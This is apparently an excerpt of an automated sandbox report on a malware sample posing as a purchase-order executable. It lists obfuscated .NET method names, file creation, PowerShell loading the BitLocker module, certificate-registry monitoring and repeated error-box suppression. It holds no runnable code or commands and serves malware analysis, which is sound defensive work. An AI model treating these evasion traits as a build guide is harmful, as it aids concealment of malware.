Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, jQI0QRLWF0SUBPkkkX.cs	High entropy of concatenated method names: 'ToString', 'YOKPGsSXls', 'WRfPNqYLxN', 'rDQP1nq1TE', 'dJZPXh0lc5', 'rCrPoygs4j', 'HUbPpKJ0Jw', 'yMFPMU1s0C', 'I6cPdRMJwH', 'hfyPSgk8oI'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, xGwSjWJQNIkl5ZeA8q.cs	High entropy of concatenated method names: 'MrQAIqTiYj', 'aLMACE7nvo', 'WFu41cGgoW', 'LK54XWyBXq', 'KuZ4oK7wUs', 'qOR4ppVd5f', 'zmb4MZBTRp', 'RAW4dQgapH', 'kJq4SysRPK', 'KX54s51uwY'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, C5gGFg5FauOGa29wLc.cs	High entropy of concatenated method names: 'YEERKDdM2b', 'USTR3merTT', 'eRDR7REWFP', 'MAXR4QZ4os', 'bXjRA6qnmJ', 'vonRYwMM7A', 'MKfR0JWnki', 'BDFR5TYfbY', 'MYCRUJmlsb', 'DYqRcvcHZs'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, bHxwUyN3Tdr8G4PiTq.cs	High entropy of concatenated method names: 'thXCvlETiuhZADjwAkV', 'VCKqUUESuspU7xPTHeR', 'HKuPquE3OdDnWmLbHKx', 'G0wYyRDFkW', 'CgVYnuGvER', 'mBcYkAshXu', 'NJTKZgEXF8MRN0FdwyC', 'Vuk9afElVJfU2tshWGp'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, RKP540HM4yXe9jqp6d.cs	High entropy of concatenated method names: 'z7o4iZZWtN', 'pLH4BbHaK4', 'XfJ4DnDVJ2', 'L6Q4H0q5lB', 'ukK4lRV0iv', 'wW04P7w8C7', 'UGs4QwR9Ib', 'toC4yUMr5q', 'iho4n5aYBk', 'H2n4kjoj6w'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, U6kGI599D4WgGtrxspt.cs	High entropy of concatenated method names: 'NKmkqBaOBt', 'RobkzSowuR', 'kFlj6GJ984', 'mjDj9PIiMG', 'qs4jmW9EbT', 'gSqjRVxB30', 'TSajvBq8B9', 'o3WjKxF6k5', 'vaVj3s9JpO', 'TJ0j7n7eRY'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, oAxwWc4y0XBtNYpeMP.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'EaamghgLeQ', 'KsqmqRmXTZ', 'TPTmzhI5Oe', 'g7wR6ytKju', 'hErR9mTNki', 'P4yRmO1MpN', 'VbYRRfQKtB', 'kGirUdQWWAXISnhvm97'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, ky7MnMMS7iO41l4PF8.cs	High entropy of concatenated method names: 's2J03CReV8', 'mn9047ZsZ6', 'xnS0YEyhim', 'jTjYqOBJXW', 'B7OYziIlSl', 'HjU06KNVfb', 'vy809U44bQ', 'WoY0mnkcFC', 'IuD0RgjjCO', 'xjb0vE8oVm'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, NKmx3ySgEINLawaDA1.cs	High entropy of concatenated method names: 'I820OmWgL8', 'Brc0wna5XL', 'mkr0FE97Bg', 'UQl0i5TV0q', 'IR50I2UXhg', 'JuH0BxDyIC', 'h4q0CuPSAp', 'Y3Q0DWJP25', 'b8W0HnA7qL', 'p7T0JTotiV'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, GFItnUzkbCgQH6Refe.cs	High entropy of concatenated method names: 'bLMkBfxxxw', 'jF2kDDOo3X', 'ia5kHwEHh3', 'giSkrlFlkH', 'GW8kNuxINx', 'M6qkXQWxRS', 'LQakoNPJ8m', 'HHIkf8ADS3', 'BfBkOc2E9Q', 'Kxnkwx7jtl'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, yUtNMNgj1qq0s8mVWU.cs	High entropy of concatenated method names: 'q0mnr1UV5F', 'GnNnN6o7Of', 'icen19uTls', 'PGTnXyOWGJ', 'LYMnobkZ8q', 'fSMnpk3kXW', 'MdlnMJ1vwB', 'oEgndeneUQ', 'wRinSSPe4b', 'iu5nsja1Fh'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, TbqoPMmuwNbw5jUc2Q.cs	High entropy of concatenated method names: 'ebHFQoGrn', 'xgxiLI8H8', 'ngyBNeaDM', 'MKbC94bHC', 'HfXHZnIRo', 'wD0J3WoGF', 'nVNF9ArPgAiJC23jsN', 'nStYuO5gAWZlRIucRF', 'PYFJae61ZnGqmMTQCH', 'HdHyq5JsR'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, V5JjKuabZqAWXDtp5s.cs	High entropy of concatenated method names: 'mGpQhS0VO6', 'kASQqMw54D', 'aHhy6v0Rku', 'sIdy9eHd9Y', 'l7bQGvKMEs', 'bLfQZVUcIR', 'Gk7Q2DudPU', 'tGEQEFDlU3', 'NtrQVWnNjc', 'CK3QLRBqWN'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, Oeqh8dDwUiwosl8xFO.cs	High entropy of concatenated method names: 'BM57EHrEG0', 'Ls97VXKQI0', 'You7LIHgEi', 'qxI7WcqrPN', 'ReF78pg3Ju', 'VHg7av83BI', 'j0m7xVAMxT', 'kli7h1lkLE', 'LCA7gpdoOO', 'OAX7qPRL4k'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, C0rKsorgR2vF5UGEWL.cs	High entropy of concatenated method names: 'sJSYK1ye4c', 'eIxY726IPV', 'VW7YAjoKX0', 'kG0Y0o0HGc', 'RcoY5yna1V', 'U9tA8S0nCv', 'zNVAaYqjRW', 'PEpAxE8Ed5', 'aVqAhPabj3', 'GDlAgnhX7S'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, A6vJ9L9mUklshRUCAIC.cs	High entropy of concatenated method names: 'ToString', 'DNnjDxCI1e', 'zcGjHGmjBp', 'TSdjJIPpU1', 'r8fjrTJbtH', 'd30jNg4O8L', 'RZjj11JQC4', 'Y7fjXGWssO', 'fGlTUA7zCjxhUBQApTu', 'hO1bWayVZRZDPalCIvE'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, ealEPex077Y4TTePms.cs	High entropy of concatenated method names: 'BOwnlE48tU', 'hJsnQYkcVp', 'KRHnnEhfaT', 'OyLnjtupx0', 'GUxnekTcf5', 'VWsnfT9Ab0', 'Dispose', 'NJJy3N4ZgE', 'Mi3y7S4SEl', 'JwOy44dsLf'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, hHXEaRqvWA7edigZUi.cs	High entropy of concatenated method names: 'f39k4GgpGc', 'ftHkAoLmM1', 'YrnkYEriRl', 'QNGk0NmZ6t', 'kULknPHSi7', 'Fs8k5p5RiW', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, Jp5oXy9vrfHSaFguhmG.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UdJTntbpWc', 'vThTkR5irO', 'LblTjyRgBg', 'zOYTTaSDee', 'DaQTeSDPEa', 'd3uTtU1s7m', 'jFnTfA8lhD'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, UgQwYbW8dTiCUFoYYM.cs	High entropy of concatenated method names: 'lhiQc8oKXn', 'hrkQbGk5t4', 'ToString', 'zjlQ3Uvp5U', 'FPsQ7OO1BL', 'kkPQ4P07bV', 'PBMQANtgjD', 'pxsQY7JoqA', 'BYpQ0T5Wx5', 'SsHQ5Sxu2w'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, cYMcXZ7Au5o5ToCO08.cs	High entropy of concatenated method names: 'Dispose', 'gY49gTTePm', 'kd9mNJ5H2A', 'jU553Cp1N8', 'NB19qnvjTc', 'Vcj9zcm2Il', 'ProcessDialogKey', 'pAwm6UtNMN', 't1qm9q0s8m', 'RWUmm4HXEa'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, iVWwabv4xXnbA1dtSj.cs	High entropy of concatenated method names: 'q1G90eqh8d', 'yUi95wosl8', 'jM49cyXe9j', 'Yp69bdOGwS', 'PeA9l8qB0r', 'eso9PgR2vF', 'zARHyUQQ8jNu1NdIrO1', 'TOMwy1QERoXcHhJFMiH', 'VPZ99jocUq', 'HnF9RDJLKv'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, zSofow2BFxtS1KqH59.cs	High entropy of concatenated method names: 'CJSuDkR68d', 'urwuHK3qkA', 'aVjur6uHAR', 'yX1uNEdnRm', 'S2YuXJ0ouo', 'wypuo1SupG', 'gWfuMet7lP', 'JequdVXtda', 'j3gusp38SN', 'BknuGpeGG2'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, ePqRFg96smRT171bqGl.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kLUkGKR8CT', 'xqekZFLBrb', 'imjk2ZNLAs', 'j0ekE6y2Bg', 'CDekVV4Ndt', 'FkwkLCANsu', 'cRukWW9L6i'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, jQI0QRLWF0SUBPkkkX.cs	High entropy of concatenated method names: 'ToString', 'YOKPGsSXls', 'WRfPNqYLxN', 'rDQP1nq1TE', 'dJZPXh0lc5', 'rCrPoygs4j', 'HUbPpKJ0Jw', 'yMFPMU1s0C', 'I6cPdRMJwH', 'hfyPSgk8oI'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, xGwSjWJQNIkl5ZeA8q.cs	High entropy of concatenated method names: 'MrQAIqTiYj', 'aLMACE7nvo', 'WFu41cGgoW', 'LK54XWyBXq', 'KuZ4oK7wUs', 'qOR4ppVd5f', 'zmb4MZBTRp', 'RAW4dQgapH', 'kJq4SysRPK', 'KX54s51uwY'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, C5gGFg5FauOGa29wLc.cs	High entropy of concatenated method names: 'YEERKDdM2b', 'USTR3merTT', 'eRDR7REWFP', 'MAXR4QZ4os', 'bXjRA6qnmJ', 'vonRYwMM7A', 'MKfR0JWnki', 'BDFR5TYfbY', 'MYCRUJmlsb', 'DYqRcvcHZs'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, bHxwUyN3Tdr8G4PiTq.cs	High entropy of concatenated method names: 'thXCvlETiuhZADjwAkV', 'VCKqUUESuspU7xPTHeR', 'HKuPquE3OdDnWmLbHKx', 'G0wYyRDFkW', 'CgVYnuGvER', 'mBcYkAshXu', 'NJTKZgEXF8MRN0FdwyC', 'Vuk9afElVJfU2tshWGp'

Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	File created: \po-1124-0018- ttr-asp1 .. 20 adet 0191621.exe
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	File created: \po-1124-0018- ttr-asp1 .. 20 adet 0191621.exe
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	File created: \po-1124-0018- ttr-asp1 .. 20 adet 0191621.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	File created: \po-1124-0018- ttr-asp1 .. 20 adet 0191621.exe	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
